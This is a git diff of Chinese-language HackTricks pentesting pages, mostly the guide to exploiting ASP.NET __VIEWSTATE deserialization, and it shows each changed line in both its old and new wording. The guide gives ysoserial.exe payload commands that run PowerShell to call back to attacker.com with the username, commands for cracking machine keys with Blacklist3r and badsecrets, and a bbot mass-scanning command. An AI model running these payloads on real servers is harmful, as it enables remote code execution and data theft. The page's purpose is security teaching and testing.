{% endcontent-ref %}
## 暴力检测列表
## 暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
## 参考资料
## 参考文献
* [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
* [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
* [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/)
* [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,79 +1,73 @@
# Exploiting \_\_VIEWSTATE without knowing the secrets
# 利用 \_\_VIEWSTATE 而不知其秘密
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册** Intigriti这是一家由黑客创建的高级 **漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## ViewState 是什么
## 什么是 ViewState
**ViewState** 在 ASP.NET 中作为默认机制,用于在网页之间保持页面和控件数据。在渲染页面的 HTML 时,页面的当前状态和在 postback 期间需要保留的值被序列化为 base64 编码的字符串。然后,这些字符串被放置在隐藏的 ViewState 字段中。
**ViewState** 是 ASP.NET 中用于在网页之间保持页面和控件数据的默认机制。在渲染页面的 HTML 时,页面的当前状态和在回发期间要保留的值被序列化为 base64 编码的字符串。这些字符串随后被放置在隐藏的 ViewState 字段中。
ViewState 信息可以通过以下属性或它们的组合来描述
ViewState 信息可以通过以下属性或其组合来表征
* **Base64**:
* 当 `EnableViewStateMac``ViewStateEncryptionMode` 属性设置为 false 时使用此格式。
* **Base64 + 启用 MAC(消息认证码)**:
* 通过将 `EnableViewStateMac` 属性设置为 true 来激活 MAC。这为 ViewState 数据提供完整性验证。
* **Base64 + 加密**:
* 当 `ViewStateEncryptionMode` 属性设置为 true 时应用加密,确保 ViewState 数据的机密性。
* **Base64**
* 当 `EnableViewStateMac``ViewStateEncryptionMode` 属性设置为 false 时使用此格式。
* **Base64 + 启用 MAC (消息认证码)**
* 通过将 `EnableViewStateMac` 属性设置为 true 来激活 MAC。这为 ViewState 数据提供完整性验证。
* **Base64 + 加密**
* 当 `ViewStateEncryptionMode` 属性设置为 true 时应用加密,确保 ViewState 数据的机密性。
## 测试
## 测试
该图表详细说明了基于 .NET 框架版本的 ASP.NET 中 ViewState 不同配置的情况。以下是内容摘要:
该图像是一个格,详细说明了基于 .NET 框架版本的 ASP.NET 中 ViewState 不同配置。以下是内容摘要:
1. 对于 **任何版本的 .NET**,当 MAC 和加密被禁用时,不需要 MachineKey因此没有适用的方法来识别它。
2. 对于 **4.5 版本以下**,如果启用了 MAC 但未启用加密,则需要 MachineKey。用于识别 MachineKey 的方法称为 "Blacklist3r"。
3. 对于 **4.5 版本以下**,无论 MAC 是否启用,如果启用了加密,则需要 MachineKey。识别 MachineKey 是 "Blacklist3r - 未来发" 的任务。
4. 对于 **4.5 及更高版本**MAC 和加密的所有组合(无论两者是否为 true或其中一个为 true 另一个为 false都需要 MachineKey。可以使用 "Blacklist3r" 识别 MachineKey。
1. 对于 **任何版本的 .NET**,当 MAC 和加密被禁用时,不需要 MachineKey因此没有适用的方法来识别它。
2. 对于 **4.5 版本以下**,如果启用了 MAC 但未启用加密,则需要 MachineKey。识别 MachineKey 的方法称为 "Blacklist3r"。
3. 对于 **4.5 版本以下**,无论 MAC 是否启用,如果启用了加密,则需要 MachineKey。识别 MachineKey 是 "Blacklist3r - 未来发" 的任务。
4. 对于 **4.5 版本及以上**,所有 MAC 和加密的组合(无论两者都为 true还是一个为 true 另一个为 false都需要 MachineKey。可以使用 "Blacklist3r" 识别 MachineKey。
### 测试案例1 EnableViewStateMac=false 和 viewStateEncryptionMode=false
还可以通过在以下位置将 `AspNetEnforceViewStateMac` 注册表键设置为零来完全禁用 ViewStateMAC
### 测试用例1 EnableViewStateMac=false 和 viewStateEncryptionMode=false
还可以通过将 `AspNetEnforceViewStateMac` 注册表项设置为零来完全禁用 ViewStateMAC
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**识别 ViewState 属性**
**识别ViewState属性**
您可以尝试使用BurpSuite捕获包含此参数的请求来识别是否使用MAC保护了ViewState。如果未使用MAC来保护参数则可以使用[YSoSerial.Net](https://github.com/pwntester/ysoserial.net)来利用它。
您可以尝试通过使用 BurpSuite 捕获包含此参数的请求来识别 ViewState 是否受到 MAC 保护。如果未使用 Mac 保护该参数,您可以使用 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) 进行利用。
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
```
### 测试案例 1.5 类似于测试案例 1但服务器未发送 ViewState cookie
### Test case 1.5 Like Test case 1 but the ViewState cookie isn't sent by the server
开发人员可以**移除 ViewState**,使其不成为 HTTP 请求的一部分(用户将不会收到此 cookie。\
有人可能会认为,如果**ViewState**不存在,他们的实现就不会受到 ViewState 反序列化可能带来的潜在漏洞的影响。\
然而,事实并非如此。如果我们**在请求体中添加 ViewState 参数**并发送使用 ysoserial 创建的序列化有效负载,我们仍然可以实现**代码执行**,就像**案例 1**中所示。
人们可能会假设,如果**ViewState****不存在**,他们的实现就**安全**,不会出现与 ViewState 反序列化相关的潜在漏洞。\
然而,事实并非如此。如果我们**将 ViewState 参数**添加到请求体中,并发送我们使用 ysoserial 创建的序列化有效负载,我们仍然能够实现**代码执行**,如**案例 1**所示。
### 测试案例2 .Net < 4.5 EnableViewStateMac=true & ViewStateEncryptionMode=false
为了为**特定页面启用 ViewState MAC**,我们需要对特定的 aspx 文件进行以下更改:
### Test Case: 2 .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
为了**启用 ViewState MAC**,我们需要在特定的 aspx 文件上进行以下更改:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
我们也可以通过在**web.config**文件中设置如下来针对**整个**应用程序执行此操作:
我们还可以通过在 **web.config** 文件中设置它来实现 **整体** 应用程序,如下所示:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
@ -84,94 +78,76 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
</system.web>
</configuration>
```
由于该参数受到MAC保护因此要成功执行攻击我们首先需要使用的密钥。
由于参数受MAC保护要成功执行攻击我们首先需要使用的密钥。
您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)来查找使用的密钥。
您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) 来查找使用的密钥。
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) 是另一个可以识别已知 machineKeys 的工具。它是用 Python 编写的,因此与 Blacklist3r 不同,没有 Windows 依赖。对于 .NET viewstates有一个 "python blacklist3r" 工具,这是使用它的最快方法。
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) 是另一个可以识别已知 machineKeys 的工具。它是用 Python 编写的,因此与 Blacklist3r 不同,它没有 Windows 依赖性。对于 .NET viewstates有一个名为 "python blacklist3r" 的实用程序,这是使用它的最快方式。
它可以直接提供 viewstate 和生成器:
它可以直接提供 viewstate 和 generator
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)
或者它可以直接连接到目标URL并尝试从HTML中提取viewstate
或者,它可以直接连接到目标 URL并尝试从 HTML 中提取 viewstate
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
要在规模上搜索易受攻击的viewstates可以结合子域枚举使用`badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) 模块:
为了大规模搜索易受攻击的 viewstate结合子域枚举可以使用 `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) 模块:
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)
如果你很幸运找到了密钥,你可以使用 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
如果你运气好并且找到了密钥,你可以使用 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
--generator = {__VIWESTATEGENERATOR parameter value}
```
在服务器没有发送`_VIEWSTATEGENERATOR`参数的情况下,您无需提供`--generator`参数,但需要提供以下参数:
在服务器**未发送**`_VIEWSTATEGENERATOR`参数的情况下,您**不需要**提供`--generator`参数**而是这些**
```bash
--apppath="/" --path="/hello.aspx"
```
### Test Case: 3 .Net < 4.5 EnableViewStateMac=true/false ViewStateEncryptionMode=true
### 测试案例3 .Net < 4.5 EnableViewStateMac=true/false 以及 ViewStateEncryptionMode=true
在这种情况下不知道该参数是否受到MAC保护。然后值可能被加密您将**需要机器密钥来加密您的有效负载**以利用该漏洞。
在这种情况下不清楚参数是否受到MAC保护。因此该值可能已加密您将**需要机器密钥来加密您的有效负载**以利用漏洞。
**在这种情况下,** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **模块正在开发中...**
**在这种情况下**[**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **模块正在开发中...**
**在 .NET 4.5 之前,** ASP.NET 可以**接受**来自用户的**未加密** \_`__VIEWSTATE`\_ 参数,即使**`ViewStateEncryptionMode`**已设置为_**始终**_。ASP.NET **仅检查**请求中**`__VIEWSTATEENCRYPTED`**参数的**存在**。**如果删除此参数并发送未加密的有效负载,它仍然会被处理。**
**在.NET 4.5之前**,即使\*\*`ViewStateEncryptionMode`**已设置为\_**Always**\_ASP.NET也可以从用户那里**接受**一个**未加密的\*\*\_`__VIEWSTATE`\_参数。ASP.NET **仅检查**请求中\*\*`__VIEWSTATEENCRYPTED`**参数的**存在\*\*。**如果删除此参数,并发送未加密的有效负载,则仍将被处理。**
因此,如果攻击者通过其他漏洞(如文件遍历)找到获取机器密钥的方法,可以使用**案例 2**中使用的[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)命令通过ViewState反序列化漏洞执行RCE。
因此如果攻击者找到一种通过另一个漏洞如文件遍历获取Machinekey的方法[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) 命令在**案例2**中使用可用于利用ViewState反序列化漏洞执行RCE
* 从请求中删除`__VIEWSTATEENCRYPTED`参数以利用ViewState反序列化漏洞否则将返回Viewstate MAC验证错误利用将失败
* 从请求中删除`__VIEWSTATEENCRYPTED`参数以利用ViewState反序列化漏洞否则将返回Viewstate MAC验证错误利用将失败。
### 测试案例4 .Net >= 4.5 和 EnableViewStateMac=true/false 以及 ViewStateEncryptionMode=true/false 除非两个属性均为false
我们可以通过在web.config文件中指定以下参数来强制使用ASP.NET框架。
### Test Case: 4 .Net >= 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true/false除了两个属性为false
我们可以通过在web.config文件中指定以下参数来强制使用ASP.NET框架如下所示。
```xml
<httpRuntime targetFramework="4.5" />
```
或者可以通过在web.config文件的`machineKey`参数中指定以下选项来完成。
或者,可以通过在 web.config 文件的 `machineKey` 参数中指定以下选项来完成此操作。
```bash
compatibilityMode="Framework45"
```
如前所述,**值是加密的。** 然后,要发送**有效的有效负载,攻击者需要密钥**。
与之前一样,数值是加密的。然后,为了发送有效的有效载荷,攻击者需要密钥。
您可以尝试使用[**Blacklist3r(AspDotNetWrapper.exe)**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)来查找正在使用的密钥:
您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)来查找正在使用的密钥:
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
@ -179,68 +155,62 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47Lw
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}
```
对于IISDirPath和TargetPagePath的更详细描述 [refer here](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
请参考[此处](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)获取有关IISDirPath和TargetPagePath的更详细描述。
或者,使用[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)(带有生成器值):
或者,使用 [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)(带生成器值):
```bash
cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
```
![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)
一旦确定了有效的Machine key**下一步是使用** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) **生成序列化的有效载荷**
一旦识别出有效的机器密钥,**下一步是使用** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) **生成序列化有效负载**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2" --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
```
如果您拥有`__VIEWSTATEGENERATOR`的值,可以尝试**使用**该值与`--generator`参数,并**省略**`--path`和`--apppath`参数。
如果你有`__VIEWSTATEGENERATOR`的值,你可以尝试使用`--generator`参数并省略`--path`和`--apppath`参数。
![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/4.2.png)
成功利用ViewState反序列化漏洞将导致向攻击者控制的服务器发出带有用户名的外带请求。这种利用漏洞的示例已在一个名为“Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET”的资源中展示。要了解利用过程的详细信息以及如何利用Blacklist3r等工具来识别MachineKey可以查看提供的[成功利用的PoC](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)。
成功利用ViewState反序列化漏洞将导致向攻击者控制的服务器发出带有用户名的带外请求。这种利用方式在一个名为“使用Blacklist3r和YsoSerial.NET利用ViewState反序列化”的概念验证PoC中得到了展示。有关利用过程如何工作的更多细节以及如何使用像Blacklist3r这样的工具来识别MachineKey可以查看提供的[成功利用的PoC](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)。
### 测试案例6 正在使用ViewStateUserKeys
**ViewStateUserKey**属性可用于**防御\*\*\*\*CSRF攻击**。如果应用程序中已定义了这样一个密钥,并且我们尝试使用到目前为止讨论的方法生成**ViewState**负载,则**应用程序不会处理该负载**。\
您需要使用一个额外的参数来正确创建负载:
### 测试用例 6 使用了ViewStateUserKeys
**ViewStateUserKey**属性可以用来**防御****CSRF攻击**。如果在应用程序中定义了这样的密钥,并且我们尝试使用到目前为止讨论的方法生成**ViewState**有效负载,**有效负载将不会被应用程序处理**。\
你需要使用一个额外的参数来正确创建有效负载:
```bash
--viewstateuserkey="randomstringdefinedintheserver"
```
### 成功利用的结果 <a href="#poc" id="poc"></a>
对于所有测试案例,如果 ViewState YSoSerial.Net 负载成功运行,则服务器会以“**500 内部服务器错误**”的形式响应,响应内容为“**此页面的状态信息无效,可能已损坏**”,并且我们会收到 OOB 请求。
对于所有测试用例,如果 ViewState YSoSerial.Net 负载 **成功** 工作,则服务器响应“**500 内部服务器错误**”,响应内容为“**该页面的状态信息无效,可能已损坏**”,并且我们获得 OOB 请求。
查看[更多信息请点击此处](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
查看 [进一步信息在这里](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/\[\*\*https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/\*\*]\(https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/\)/README.md)
## 参考资料
## 参考文献
* [https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
* [https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
* [https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [https://blog.blacklanternsecurity.com/p/introducing-badsecrets](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\\
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示**: **注册** Intigriti一个由黑客创建的高级 **漏洞赏金平台**!立即加入我们,访问 [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客攻击: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,29 +1,30 @@
# Java DNS 反序列化、GadgetProbe 和 Java 反序列化扫描器
# Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 反序列化的 DNS 请求
## 反序列化的 DNS 请求
`java.net.URL` 类实现了 `Serializable` 接口,这意味着这个类可以被序列化。
